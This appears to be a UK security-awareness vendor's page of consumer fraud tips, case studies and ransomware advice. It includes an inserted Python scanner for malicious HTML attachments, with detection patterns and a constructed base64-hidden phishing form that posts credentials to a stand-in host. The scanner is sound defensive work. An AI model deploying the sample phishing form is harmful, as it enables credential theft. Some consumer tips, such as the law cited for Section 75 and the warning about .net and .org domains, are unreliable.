Infosec Cloud
Solutions. Services. Training.

Stay Cyber-Safe this Christmas

Here are a few tips to help you stay ‘cyber-safe’ at home over the holidays.


Watch out for fake websites

It’s very easy for cyber-criminals to create a spoofed website that looks like an official retailer and then offer ‘unbelievable’ deals. Once a payment is made you may receive inferior products, and that’s if they arrive at all. Remember to always check the URL of the website and look out for domain names that end in .net or .org.

Pay by credit card

Credit cards provide protection if things go wrong with a purchase. If the goods don’t show up or are faulty, and cost more than £100, Section 75 of the Consumer Rights Act means you can claim the money back. For goods under £100, or payments made by debit card, you can ask your bank to recover the money through “chargeback”. Always be suspicious if a website asks you to make a bank transfer instead of paying by card.

Make sure the site is secure

Check for ‘https’ at the start of the website URL. The ‘s’ stands for secure. Look for a padlock in the browser’s address bar, usually to the left of the URL. If the padlock appears within the page itself rather than in the address bar, this is probably a spoofed website.

Beware of phishing emails

Phishing messages are designed to appear from trusted organisations such as your bank or HMRC, or familiar retailers like Apple, Tesco and Argos. They aim to trick you into revealing personal details. The emails usually contain links which when clicked download malicious software or take you through to a spoofed website where your personal details are requested.

Over the Christmas holidays, be very wary of emails from retailers offering deals or cash prizes. Check the email address and don’t click on any links embedded in the message. Even an “unsubscribe” link could be malicious.

Don’t trust WhatsApp messages offering gift cards

WhatsApp users have reported receiving messages offering Topshop and Sainsbury’s gift cards that appear to be sent from a phone contact. The link takes you through to an official-looking site which requests personal details.

Clicking on the link would also allow cyber-criminals to collect personal information from your device that could track you. Delete messages like these even if they look like they’ve come from someone you trust and install security software on your device.

‘Freebies’ on Facebook

Free iPads, flights, shopping vouchers, Alton Towers tickets and cheap Ray-Ban sunglasses all fall into the category of “if it looks too good to be true, it probably is”.

Cyber-criminals create attractive looking deals which they post on Facebook asking users to “like” and “share” the advert to boost it to the top of news feeds and target a wider audience. If you click through you will be asked for personal details which can be used for fraudulent purposes. The posts may appear to be from legitimate companies – check if the Facebook account is verified with a blue tick.

Avoid shopping on public Wi-Fi

Internet hotspots offered by coffee shops, libraries and bars may be incredibly convenient but are extremely vulnerable. A cyber-criminal can easily hack into the network and access your user details or set up their own fake hotspot. If you’re shopping or banking online use your own 3G/4G network or wait until you get home.

Don’t fall for the “Click and Receive” scam

Be suspicious of emails that ask you to click on a link and enter your details to rearrange a delivery. It won’t tell you what the item is but over the holiday period thousands of people are likely to have ordered something online and may be tricked into handing over personal information.

In some cases credit card details may be asked for to “verify” the delivery. Be suspicious if the email doesn’t tell you what the ordered goods are and if in doubt, retrace your order trail and make a call to the company you’re expecting a delivery from.

When shopping on eBay stick to the rules

There are various ways that eBay protects users – those who don’t stay within the guidelines will struggle to get their money back if they fall victim to a scam. Always pay by PayPal – most items will then be protected by eBay’s Money Back Guarantee. Scammers will try to get you to pay by bank transfer or a service such as MoneyGram. Do this and you forfeit your protection.

Also be wary of sellers contacting you directly to offer you a better deal than the listed price. Be careful of those with little or no selling history.

Watch out for fake customer reviews

More than half of UK adults use online review websites such as Amazon, Tripadvisor, Expedia and Checkatrade to find the best bargains.

But among the genuine reviews are millions of fakes. Be suspicious if too many of the reviews seem similar – it suggests they are being copied and pasted or written by the same person. It should raise a red flag if the reviews are all very new. If you are at all suspicious of the website avoid it.

If you think you’ve been a victim of a scam – act fast

If you’ve been conned, call your bank immediately and ask them to try to stop the payment. The sooner you do this, the better your chance of getting your money back. Banks will only refund customers who have been defrauded on their credit or debit card, or where a transaction has been made without their authorisation. Call your bank yourself, not a phone number given in a possibly fraudulent letter or email.

Banks are not responsible for reimbursing customers who have been deceived into making payments.

If action is taken swiftly and there are funds remaining in the cyber-criminal’s account, your bank may be able to claw the money back by requesting an indemnity. If you feel your bank has not done enough to help you, make a complaint and take it to the Financial Ombudsman to investigate. You should also report it to Action Fraud.

Websites for more information:

Get Safe Online: https://www.getsafeonline.org/

The UK’s leading awareness resource helping protect people, finances, devices and businesses from fraud, abuse and other issues encountered online.

Action Fraud: https://www.actionfraud.police.uk/

The UK’s national fraud and cyber-crime reporting centre. The easiest way to report fraud and cyber-crime is by using the online reporting tool.

Stay Vigilant and Stay Safe this Christmas Holiday Time!



    Cyber Security Awareness Training & Testing (SATT) shortlisted for British Legal Awards

    Infosec Cloud is delighted to have been shortlisted for this year’s British Legal Awards. The company’s Security Awareness Training and Testing (SATT) managed service has been recognised as a finalist for the Supplier of the Year (Technology) Award.

    Organised by ‘Legal Week’, the awards will be judged by an independent panel of judges made up of senior in-house lawyers, former managing and senior partners and other senior business figures.

    Infosec Cloud’s entry focuses on the company’s Legal Sector Security Awareness Training and Testing (SATT) managed service, developed to stop IT End Users causing security incidents.

    Holding high-value information and financial details, legal practices and partnerships are particular targets for cyber criminals. Firms also have a high proportion of senior staff members who may be reluctant to follow corporate security procedures, and staff are under increasing time and workload pressures, making them even more vulnerable to today’s sophisticated cyber-attacks.

    To help the legal sector protect their data, clients and reputation, and following an in-depth market evaluation, Infosec Cloud developed their own fully managed Security Awareness Training and Testing (SATT) service. The service was launched in 2014.

    Today, nearly 80,000 IT End Users, across the UK, are enrolled on the Infosec Cloud SATT service. Legal customers include many of the top 200 law firms and all grade the service as ‘meets or exceeds expectations’ (quarterly satisfaction survey). The SATT service is applicable to organisations of all sizes, whether national or regional, plus the company is working with both LEXCEL assessors and Law Firm Networks.

    Commenting on the awards, Infosec Cloud Managing Director, Pete Sherwood says: “Being shortlisted for this award is great recognition for the service we have developed and the value it is providing to the Legal Sector in terms of keeping Firms and Partnerships cyber safe”.

    Security awareness training is not new, however the way that it is delivered, tracked and kept front of mind by Infosec Cloud is new. The SATT service comprises both training and ongoing testing with focused remedial training. The company has invested in a dedicated SATT team that researches, builds and tracks the simulated cyber-attacks, with bespoke content created for each customer.

    The SATT service is fully managed so that there are no additional time requirements for the IT team. Plus as an ‘independent’ third party, Infosec Cloud ensures all staff, regardless of seniority, are included.


    The British Legal Awards serve as a showcase for the achievements of one of the country’s most successful sectors. Hosted by Legal Week in association with The City of London Law Society, the glittering awards ceremony is attended by 1,000 lawyers, representing the cream of the UK’s legal community. This year’s ceremony will take place on Thursday 30 November at Finsbury Square, London EC2.


    Infosec Cloud builds Staff Security Awareness at Poole Grammar School

    School achieves Top Marks for Staff Security Awareness Training & Testing.

    Infosec Cloud started working with Poole Grammar School (PGS) in early 2016, to train staff to spot fraudulent emails and websites, and to be alert to the full range of today’s potential cyber attacks.

    After a very successful 12 months of providing Cyber Security Awareness Training & Testing (SATT), PGS has recently renewed the service for another year. All training materials and phish tests are continually updated to reflect current threats, so continuing the service will ensure staff remain fully alert and vigilant.

    Having successfully completed 12 months of training and testing, PGS staff are pro-actively helping to protect the school plus its connected suppliers, partners and families.

    PGS is a selective boys’ grammar school and academy in Poole, Dorset. The school has 1200 pupils, aged 11 to 18, with an appropriately sized teaching, support and leadership team. IT Network Manager Jeff Hay was acutely aware of the risk of cyber security attacks on the school: attacks that could result in criminal access to confidential information or the launch of a costly ransomware attack.

    In fact in January 2017, Action Fraud, the UK’s fraud and cybercrime centre, reported that cyber criminals were targeting UK schools, demanding payments of up to £8,000 to unlock data they had encrypted with malware.

    With the increasing frequency and sophistication of cyber attacks, the biggest threat is actually people’s lack of information and naivety. It can take just one click to compromise an entire school’s networks and data.
    Jeff Hay, IT Network Manager, Poole Grammar School.

    However, working at one of the country’s top schools, Jeff understood that training alone is not enough. Day to day behaviour can only be changed by a combination of training and targeted testing. The very fact that staff know they will be tested makes sure they remain extra vigilant so as not to be ‘caught out’.

    That’s why PGS selected Infosec Cloud to provide their fully managed Cyber Security Awareness Training & Testing service.

    Fully Managed Service:

    Infosec Cloud provides PGS with cyber security awareness training and testing as a fully managed service. This ensures all staff, from the Head Teacher down, are included in the program. All PGS needed to do was to provide Infosec Cloud with an Excel spreadsheet of staff names and email addresses.

    Integrated 12 month program:

    High quality, bite-sized video training is delivered online at the desktop, with an integrated 12 month program of bespoke test phishing emails.

    Vulnerable staff who fall for the emails after the initial training are provided with immediate, relevant remedial training.

    The training has heightened everyone’s awareness and hopefully staff will delete the threat before we have to fall back on PC security, Antivirus, or in the worst case, backups. Even better is that the staff now know how to respond if they have opened an attachment or followed a suspect link. This gives the IT Team a fighting chance of nullifying the threat!
    Jeff Hay, IT Network Manager, Poole Grammar School

    The 12 month program comprises:

    1. Initial baseline phishing email test
    2. 15 minute Video Training for all staff – delivered online
    3. 11 month program of random test phishing emails
    4. 40 minute remedial training for vulnerable staff members (those who still click after the training)
    5. Monthly reports and full program management

    Infosec Cloud also provided internal communications for school staff explaining the training and testing process, and why everyone needs to remain vigilant at all times, plus guidelines for Jeff to handle any staff concerns.

    Results and Reports

    All staff were trained within the first three months and after training the average click rate was reduced to 4%, down from the initial baseline of 55%.

    Jeff receives monthly updates detailing the staff training status and who has clicked on deceptive links, opened potentially malicious attachments and entered logon credentials to spoofed landing pages. All this information remains confidential and is only used to provide vulnerable staff members with additional training.


    2016 Research – Cyber Attacks on Law Firms Increasing

    73% of top 100 law firms targeted in 2016

    The 2016 PwC Law Firms Survey reports that an increasing number of security incidents are being experienced across the UK legal sector. The research found that 73% of the UK top 100 law firms were the target of attacks last year.

    Although larger firms are the greatest target, all law firms are targets for cyber-crime due to the confidential information held and the large volume of client funds retained. The very nature of law firms makes them an attractive target.

    Key findings:

    *  Information security is a significant area of risk to the legal industry with 73% of all law firms reporting they had suffered from a security incident.
    *  The most common incidents relate to phishing attacks (malicious emails) and infection by viruses/malicious software, with 84% and 55% of firms respectively stating they have suffered one such incident during the past 12 months.
    *  Whilst there is an increasing threat from outsiders, 41% of all law firms report that they have suffered incidents as a result of their own staff.

    Security awareness training and simulated, random cyber-attack testing is proven to actually change staff behaviour and build a human firewall of vigilant, empowered employees.


    New Ransomware Simulator

    How Vulnerable Is Your Network? Find out with this new Ransomware Simulator.

    Request a copy of this new, free tool to see if your network is effective in blocking ransomware – just in case your employees fall for social engineering attacks.

    The Ransomware Simulator “RanSim” gives you a quick look at the effectiveness of your existing network protection.

    RanSim will simulate 5 ransomware infection scenarios and show you if a workstation is vulnerable to infection. RanSim is complimentary; there are no costs.

    This will take around five minutes, and may give you some insights you never expected…

    Contact our security awareness technical team at: [email protected] to request your copy of the Ransomware Simulator.

    If you then find that your AV is not blocking any of the 5 scenarios, contact Infosec Cloud to learn more about Next Generation Endpoint Protection and our fully Managed End User Security Awareness Training and Testing Service.


    Are employees your greatest risk?

    The Business Debate: Can the greatest asset of a business also be one of its greatest risks?

    Interview with Paul Hopkins, Technical Director, Institute of Risk Management.


    Luscombe Drinks refreshes staff Security Awareness

    Luscombe Drinks invests in end user IT Security Awareness Training and Testing, to protect both their own data and networks, and those of their connected suppliers and customers.

    Luscombe is ensuring all their employees are informed, empowered and vigilant against today’s online and physical cyberattacks with company-wide Security Awareness Training and Testing.

    Luscombe is aware that not only could sensitive or confidential data, such as details of their recipes and processes, be breached, but that a ransomware attack could result in major operational disruption with subsequent loss of business, customers and reputation.

    The company has been producing quality fruit drinks since 1975. All drinks are crafted with exceptional care and integrity. There are no compromises, only the best goes in the bottle.

    When Luscombe decided to train their employees to be security aware, they contacted Infosec Cloud to deliver their fully managed end user Security Awareness Training and Testing (SATT) service.

    Fully Managed Service

    Infosec Cloud provides the training and testing as a fully managed service. This ensures all employees, including the IT team and senior management, are included in the programme. All Luscombe needed to do was to provide Infosec Cloud with an Excel spreadsheet of employee names and email addresses.

    Integrated 12 Month Programme

    Infosec Cloud is delivering the video-based interactive online training with an integrated 12 month programme of random test phishing emails. Vulnerable employees who fall for the emails after the initial training are provided with immediate remedial training.

    The 12 month programme comprises:

    1.    Initial baseline phishing email test
    2.    15 minute Video Training for all employees – delivered at the desktop
    3.    11 month programme of random test phishing emails
    4.    40 minute remedial training for vulnerable employees (those who click)
    5.    Monthly reports and full programme management

    Infosec Cloud provided Luscombe with internal communications explaining the training and testing process, and why employees need to remain vigilant at all times, plus guidelines for the IT Helpdesk, used to handle any employee concerns.

    Wayne Martin, IT & Engineering Manager, Luscombe Drinks said: “There are many companies offering Security Awareness Training, however the Infosec Cloud programme is different, and has actually changed our employees’ behaviour. The combination of training and simulated cyber-attacks, such as phishing emails, is certainly keeping us all on our toes.”

    Training Videos

    Within two months, all Luscombe employees had completed the training. The training videos, delivered at the desktop, include real-life examples and scenarios. The videos can be paused and replayed as needed, and cover:

    1.    Your Role – Internet Security and You
    2.    Common Traps – How Criminals Try to Trick You
    3.    Red Flags – Warning Signs That Alert You
    4.    Danger Zone Exercise – Find the Red Flags

    Wayne Martin continued: “Our employees all liked the training videos as they were able to watch them at their own pace and when most convenient. They are now applying this knowledge in their day to day jobs.”

    Security Awareness Training and Testing helps build a human firewall. Interactive training is delivered at the desktop and reinforced with random, simulated test cyberattacks, such as tailored phishing emails.

    Now at month four, the Luscombe Drinks employees’ phishing email click-through rate is down to zero. The testing and training cycle will continue, with users seeing different phishing emails every month, at random. There may be some further ‘clicks’, however the trend should be a constant, low click rate.

    The results show how a combination of web-based training and frequent simulated phishing attacks really works.

    Luscombe Drinks has found that a small investment in end user Security Awareness Training and Testing means they can safely concentrate on doing what they do best, making drinks that are a real pleasure to taste.

    About Luscombe Drinks
    Luscombe Drinks has been making beautiful drinks since 1975. Based on a farm in deepest Devon, all of the drinks are crafted with exceptional care and integrity. Gabriel David, the head of the family-owned business, sources the ingredients direct from growers he trusts. There are no compromises, only the best goes in the bottle. http://www.luscombe.co.uk/


    Hidden Dangers of HTML Attachments

    Over the last six to nine months, we’ve seen a lot of .DOC and .JS files used as malicious attachments, mainly for ransomware attacks.

    However, our researchers have spotted an up-and-coming trend: malicious HTML “attackments” that are used for credential phishing. Cyber criminals are using .HTML attachments to spoof bank login pages, popular online services and secure messages from financial institutions.

    There are a couple of reasons why the cyber criminals have taken a liking to HTML:

    1. Reduced chance of AV detection

    Carefully crafted .HTML files can reduce the chances that phishing emails sporting those attachments will be stopped by email security software or devices. While .EXE and Office files (.DOC, .XLS, etc.) pose obvious threats in a Windows environment and have a long history of being used in malspam (malicious spam email), .HTML files are not commonly associated with email-borne attacks — at least not recently (several years ago they were being used to deliver malicious JavaScript). Moreover, .HTML files can be used to embed URL redirects to evade AV scanners that check only URLs that appear in the bodies of emails. HTML files can also be used to deliver obfuscated web pages (usually base64 encoded) that might slip past even scanners that do check .HTML attachments.

    2. User familiarity

    Although your users and employees may not recognise the potential threat of .HTML attachments, that doesn’t necessarily mean they aren’t familiar with them. HTML attachments are commonly used by banks and other financial institutions to deliver secure documents and messages as well as to enable users to conduct banking business in a secure environment.
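    The evasion tricks listed above (redirect-only pages, base64-obfuscated markup, forms that harvest credentials) can be checked for at the mail gateway before a user ever sees the attachment. The following Python triage script is an added example, not Infosec Cloud’s tooling; the heuristics, the host names (example.invalid, secure.bank.example) and the three sample attachments are all constructed here for illustration.

```python
import base64
import re
from html.parser import HTMLParser


class _TagCollector(HTMLParser):
    """Collect form actions, input types and meta-refresh targets from one document."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.input_types, self.meta_refresh = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input":
            self.input_types.append((a.get("type") or "text").lower())
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.meta_refresh.append(a.get("content") or "")


BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")  # far longer than a normal attribute
JS_REDIRECT = re.compile(r"location(?:\.href)?\s*=\s*['\"]|location\.replace\s*\(", re.I)
RUNTIME_DECODE = re.compile(r"\b(?:atob|unescape)\s*\(", re.I)
URL_HOST = re.compile(r"https?://([^/'\"\s>]+)", re.I)


def _decode_if_html(blob):
    """Return the decoded text when a base64 run hides markup, else None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
    except ValueError:  # bad alphabet or padding: not a clean base64 run
        return None
    low = text.lower()
    return text if "<" in text and any(t in low for t in ("<html", "<form", "<script")) else None


def scan_html_attachment(html, trusted_hosts=(), _depth=0):
    """Return (score, findings) for one attachment body; the score is the finding count."""
    findings = []
    tags = _TagCollector()
    tags.feed(html)

    # 1. Redirects: the attachment is just a trampoline to a site hosted elsewhere.
    for content in tags.meta_refresh:
        findings.append("meta-refresh redirect: " + content)
    if JS_REDIRECT.search(html):
        findings.append("JavaScript location redirect")

    # 2. Obfuscation: a whole page hidden in base64; scan the decoded page too (one level).
    for blob in BASE64_RUN.findall(html):
        inner = _decode_if_html(blob)
        if inner is not None:
            findings.append("base64 blob (%d chars) decodes to HTML" % len(blob))
            if _depth < 2:
                findings.extend("inside blob: " + f
                                for f in scan_html_attachment(inner, trusted_hosts, _depth + 1)[1])
            break
    if RUNTIME_DECODE.search(html):
        findings.append("runtime decoding via atob()/unescape()")

    # 3. Credential capture: a password box, or a form posting to a host we do not trust.
    if "password" in tags.input_types:
        findings.append("password input field")
    trusted = {h.lower() for h in trusted_hosts}
    for action in tags.form_actions:
        m = URL_HOST.match(action)
        if m and m.group(1).lower() not in trusted:
            findings.append("form posts to external host " + m.group(1))
    return len(findings), findings


def verdict(score):
    """Simple gateway policy: one signal is worth a look, two or more gets held."""
    return "allow" if score == 0 else "review" if score == 1 else "hold"


# --- constructed samples (not real attachments) -----------------------------------
BENIGN_ATTACHMENT = (
    "<html><body><h1>Your statement is ready</h1><p>Log in at "
    "<a href='https://secure.bank.example/'>our website</a> to view it.</p></body></html>")

REDIRECT_ATTACHMENT = (
    "<html><head><meta http-equiv='refresh' content='0;url=https://example.invalid/login'>"
    "<script>window.location.href='https://example.invalid/login';</script></head>"
    "<body>Redirecting to secure message...</body></html>")

_HIDDEN_LOGIN_PAGE = (  # the real phishing form, shipped only as a base64 string
    "<html><body><form method='post' action='https://example.invalid/collect'>"
    "Email <input name='email'> Password <input type='password' name='pw'>"
    "<input type='submit' value='Sign in'></form></body></html>")
OBFUSCATED_ATTACHMENT = (
    "<html><body><script>document.write(atob('"
    + base64.b64encode(_HIDDEN_LOGIN_PAGE.encode()).decode()
    + "'));</script></body></html>")
```

    Run `scan_html_attachment(OBFUSCATED_ATTACHMENT)` and the findings list the hidden password form and its external collection host even though neither appears in the visible markup; the plain statement notice scores zero.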

    User Education is your best defence:

    Inevitably, your filters are going to miss some of these, and we suggest you send the following to your employees as part of your ongoing awareness campaign:

    Internet criminals never stop trying to get past our spam filters and trick you into clicking on phishing links or opening malicious email attachments.

    This is a warning against a new type of attack that uses an HTML attachment which tries to scam you into entering your user name and password.

    HTML attachments are often used by banks for secure messages, so you might think that these are always safe. They are NOT. If you get an email with an HTML attachment, be just as careful as always and do not open it unless you have asked for it, or have verified with the sender that the attachment is legitimate.

    Remember: Always Think Before You Click!

    Regular Security Awareness Training is critical to ensuring that your employees recognise and correctly respond to the actual threats they will encounter. Find out how affordable this is for your organisation – less than £1/user/month.

    If you do not like to click on redirected buttons, here is a link you can cut and paste:
    http://www.infosec-cloud.com/security-awareness/free-security-awareness-training-quote/

    Ransomware: User Education is First Line of Defence

    Guest post: Mike Gillespie, director of cyber research and security at The Security Institute

    What is the best strategy for business to protect against ransomware?

    Ransomware has yet again reared its ugly head and despite various security websites issuing warning notices, people are still falling foul of it.

    Ransomware is, in essence, a method of extorting money from an unsuspecting individual or organisation, most frequently by denying them access to their files through encryption of their data or hard drive.

    One ransomware attack vector is via phishing or spam emails, as the unsuspecting individual may inadvertently open an attachment or follow what they perceive to be a bona fide web link. Clicking on the suspicious attachment or web link initiates a malware download, which then encrypts the user’s files or hard drive. Once this is complete, the user is required to pay.

    Payment is often demanded in Bitcoin to unlock an organisation’s files or hard drive. It has been widely reported by victims that despite paying this “ransom”, they have still been unable to access the encrypted files or hard drive. So it is clear that prevention is better than cure when dealing with ransomware.

    Depending on the type and version of ransomware that has been installed, there is a possibility that the user’s files or hard drive have not actually been encrypted, but a small piece of software has been installed that gives the impression that encryption has taken place.

    This relies heavily on the emotional response of the victim and the fear that they could be compromised; such a fear is enough to prompt a response and, potentially, payment.

    It is impossible to tell from the ‘splash screen’ that appears whether or not it is a genuine ransomware payload and only an attempt to use or recover the user’s files will clarify this.

    Numerous strategies

    There are numerous strategies for safeguarding against ransomware. The first, and by far the most effective, is user awareness and education, because ransomware does not install itself. For the malware to be downloaded successfully, it needs some form of user interaction, whether via phishing emails or by fraudulent websites that serve up ‘drive-by’ malware.

    Ensure that all your staff, including management, recognise phishing and spam and so do not open suspicious emails or follow links to other websites unless they can be sure they are bona fide links. All users should also be cautious or even suspicious of attachments, pictures or graphics received unexpectedly from known persons, because the sender’s email account may have been compromised.

    If in doubt, do not open any email without first confirming its origin by contacting the sender. It is also recommended to switch off any email preview window within a mail program because this may trigger the ransomware download.

    Also, spear phishing might be used for a targeted ransomware attack on a specific user. This might make the malicious email hard to spot.

    Scan all attachments

    Secondly, ensure that any antivirus email program or software is up to date and scheduled to scan all email traffic to identify spam emails or emails that may contain known threats. This software should also be configured to scan all attachments or pictures embedded within emails or instant messaging attachments.

    Thirdly, all hardware and software should be correctly patched and updated to the latest version to ensure that all known weaknesses or vulnerabilities have been addressed by the relevant supplier.

    Finally, a good back-up regime is essential in this ever-changing virtual and internet-based environment. Remember, it is not sufficient just to make backups because they need to be tested to ensure they actually work.

    In the event of your system being infected with ransomware, don’t give up hope or pay any ransom. There are various products available that can help to recover your files.

    It is imperative that organisations take the threat of ransomware seriously. Once infected, the inability to access files or systems may affect other services offered by the organisation. An organisation’s ability to recover quickly from any ransomware infection will be greatly enhanced by having effective business continuity mechanisms available and free from infection.

    This article was first published in Computerweekly.com in February 2016


    Phishing emails and bogus contact: HMRC examples

    If you think you have received an HM Revenue and Customs (HMRC) related phishing or bogus email or text message, you can check it against the examples shown in a free HMRC guide.

    It will assist HMRC investigations if you report all ‘HMRC related’ phishing emails and bogus text messages to HMRC. Even if you receive the same / similar phishing email or text message on multiple occasions, please forward it to [email protected] and then delete it.

    Do not open any attachments or click on any links within the email or text message, as they may contain malicious software or direct you to a bogus website.

    End User Security Awareness Training – at less than £1/user/month

    Now is the time to invest in Security Awareness Training, so that your end users understand the mechanisms of:

    • Spam
    • Spear Phishing
    • Pop ups
    • Malware
    • Social engineering
    • Phishing
    • Website Security
    • Adverts
    • Ransomware
    • Physical security

    The consequences of failing to do so go well beyond bad headlines. One significant data breach can lead to lost jobs, substantial legal costs, non-compliance penalties, loss of brand reputation, customer loss, and a catastrophic hit on the bottom line. You only need to read the latest news to see why it is imperative that you take action today to protect your company and your employees.

    Every company needs to invest immediately in results-driven security awareness training for all employees – from the CEO down…

    Infosec Cloud provides fully managed Security Awareness Training reinforced by frequent simulated, randomised cyberattacks to help organisations create cultural change and build a human firewall.
